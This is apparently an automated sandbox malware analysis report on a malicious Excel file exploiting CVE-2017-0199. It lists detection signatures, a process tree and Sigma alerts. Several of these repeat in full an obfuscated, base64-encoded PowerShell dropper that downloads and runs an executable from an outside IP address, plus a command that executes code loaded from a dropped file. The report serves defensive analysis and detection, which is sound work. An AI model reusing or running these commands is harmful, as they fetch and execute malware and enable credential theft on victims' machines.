Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsx

Overview

General Information

Sample name:SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsx
Analysis ID:1543746
MD5:476e05dbccfd74ce2aa888a42d0438e8
SHA1:6e763cf9a6825c5ce3224a4630625659bad08b51
SHA256:b8fdd158f41abbd97902857a684a23003d32ebe27ba601d83e0778ee1bdd2ea9
Tags:xlsx
Infos:

Detection

HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: System File Execution Location Anomaly
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3344 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3612 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 3704 cmdline: "C:\Windows\SYstEm32\windowSpoWerSHell\V1.0\pOWeRSHelL.exe" "POWeRShELL -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE ; iEX($(iEX('[sYsTem.TeXt.ENcOdiNG]'+[cHaR]58+[ChAR]0X3A+'Utf8.gETSTRing([SySTeM.cOnVERt]'+[chAr]0x3a+[ChaR]58+'FrOMbASE64StRInG('+[ChAr]0X22+'JFZrYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJERUZpbmlUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxtT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBna1ZRa2xsWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2hjcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1ZQd3ZTLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSWl5cVNOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKTmopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRkeklWbkpaQllrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFLeVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVmthOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMjE0LzkwMi93YWxuZXh0LmV4ZSIsIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSIsMCwwKTtzdEFSVC1zTGVFcCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHdsYW5leHQuZXhlIg=='+[cHAr]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3808 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 3920 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 3928 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6549.tmp" "c:\Users\user\AppData\Local\Temp\muz5o0kx\CSCE919D41A8D904501847FAAE39BA08A1.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wlanext.exe (PID: 4008 cmdline: "C:\Users\user\AppData\Roaming\wlanext.exe" MD5: 2F9C0BA283506D8333E4F59B29FBEBA3)
          • powershell.exe (PID: 4036 cmdline: powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) " MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • msiexec.exe (PID: 2100 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\niceworkingthingswithgreatthingsevengetbackwithgoodnews[1].htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    00000011.00000002.629304100.0000000022061000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: msiexec.exe PID: 2100JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

        System Summary

        barindex
        Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3344, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\niceworkingthingswithgreatthingsevengetbackwithgoodnews[1].hta
        Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3704, TargetFilename: C:\Users\user\AppData\Roaming\wlanext.exe
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\SYstEm32\windowSpoWerSHell\V1.0\pOWeRSHelL.exe" "POWeRShELL -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE ; iEX($(iEX('[sYsTem.TeXt.ENcOdiNG]'+[cHaR]58+[ChAR]0X3A+'Utf8.gETSTRing([SySTeM.cOnVERt]'+[chAr]0x3a+[ChaR]58+'FrOMbASE64StRInG('+[ChAr]0X22+'JFZrYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJERUZpbmlUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxtT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBna1ZRa2xsWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2hjcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1ZQd3ZTLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSWl5cVNOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKTmopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRkeklWbkpaQllrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFLeVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVmthOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMjE0LzkwMi93YWxuZXh0LmV4ZSIsIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSIsMCwwKTtzdEFSVC1zTGVFcCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHdsYW5leHQuZXhlIg=='+[cHAr]34+'))')))", CommandLine: "C:\Windows\SYstEm32\windowSpoWerSHell\V1.0\pOWeRSHelL.exe" "POWeRShELL -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE ; iEX($(iEX('[sYsTem.TeXt.ENcOdiNG]'+[cHaR]58+[ChAR]0X3A+'Utf8.gETSTRing([SySTeM.cOnVERt]'+[chAr]0x3a+[ChaR]58+'FrOMbASE64StRInG('+[ChAr]0X22+'JFZrYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJERUZpbmlUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxtT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBna1ZRa2xsWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2hjcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1ZQd3ZTLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSWl5cVNOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKTmopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRkeklWbkpaQllrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFLeVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgI
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3344, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3612, ProcessName: mshta.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SYstEm32\windowSpoWerSHell\V1.0\pOWeRSHelL.exe" "POWeRShELL -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE ; iEX($(iEX('[sYsTem.TeXt.ENcOdiNG]'+[cHaR]58+[ChAR]0X3A+'Utf8.gETSTRing([SySTeM.cOnVERt]'+[chAr]0x3a+[ChaR]58+'FrOMbASE64StRInG('+[ChAr]0X22+'JFZrYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJERUZpbmlUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxtT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBna1ZRa2xsWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2hjcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1ZQd3ZTLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSWl5cVNOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKTmopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRkeklWbkpaQllrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFLeVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVmthOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMjE0LzkwMi93YWxuZXh0LmV4ZSIsIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSIsMCwwKTtzdEFSVC1zTGVFcCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHdsYW5leHQuZXhlIg=='+[cHAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3704, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE, ProcessId: 3808, ProcessName: powershell.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\wlanext.exe" , CommandLine: "C:\Users\user\AppData\Roaming\wlanext.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wlanext.exe, NewProcessName: C:\Users\user\AppData\Roaming\wlanext.exe, OriginalFileName: C:\Users\user\AppData\Roaming\wlanext.exe, ParentCommandLine: "C:\Windows\SYstEm32\windowSpoWerSHell\V1.0\pOWeRSHelL.exe" "POWeRShELL -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE ; iEX($(iEX('[sYsTem.TeXt.ENcOdiNG]'+[cHaR]58+[ChAR]0X3A+'Utf8.gETSTRing([SySTeM.cOnVERt]'+[chAr]0x3a+[ChaR]58+'FrOMbASE64StRInG('+[ChAr]0X22+'JFZrYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJERUZpbmlUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxtT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBna1ZRa2xsWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2hjcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1ZQd3ZTLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSWl5cVNOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKTmopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRkeklWbkpaQllrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFLeVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVmthOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMjE0LzkwMi93YWxuZXh0LmV4ZSIsIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSIsMCwwKTtzdEFSVC1zTGVFcCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHdsYW5leHQuZXhlIg=='+[cHAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3704, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\wlanext.exe" , ProcessId: 4008, ProcessName: wlanext.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYstEm32\windowSpoWerSHell\V1.0\pOWeRSHelL.exe" "POWeRShELL -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE ; iEX($(iEX('[sYsTem.TeXt.ENcOdiNG]'+[cHaR]58+[ChAR]0X3A+'Utf8.gETSTRing([SySTeM.cOnVERt]'+[chAr]0x3a+[ChaR]58+'FrOMbASE64StRInG('+[ChAr]0X22+'JFZrYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJERUZpbmlUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxtT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBna1ZRa2xsWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2hjcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1ZQd3ZTLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSWl5cVNOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKTmopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRkeklWbkpaQllrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFLeVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVmthOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMjE0LzkwMi93YWxuZXh0LmV4ZSIsIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSIsMCwwKTtzdEFSVC1zTGVFcCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHdsYW5leHQuZXhlIg=='+[cHAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3704, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.cmdline", ProcessId: 3920, ProcessName: csc.exe
        Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3344, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 199.217.106.226, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 2100, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49168
        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3704, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\walnext[1].exe
        Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3344, Protocol: tcp, SourceIp: 188.114.96.3, SourceIsIpv6: false, SourcePort: 443
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3704, TargetFilename: C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.cmdline
        Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3344, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SYstEm32\windowSpoWerSHell\V1.0\pOWeRSHelL.exe" "POWeRShELL -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE ; iEX($(iEX('[sYsTem.TeXt.ENcOdiNG]'+[cHaR]58+[ChAR]0X3A+'Utf8.gETSTRing([SySTeM.cOnVERt]'+[chAr]0x3a+[ChaR]58+'FrOMbASE64StRInG('+[ChAr]0X22+'JFZrYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJERUZpbmlUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxtT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBna1ZRa2xsWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2hjcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1ZQd3ZTLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSWl5cVNOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKTmopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRkeklWbkpaQllrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFLeVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVmthOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMjE0LzkwMi93YWxuZXh0LmV4ZSIsIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSIsMCwwKTtzdEFSVC1zTGVFcCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHdsYW5leHQuZXhlIg=='+[cHAr]34+'))')))", 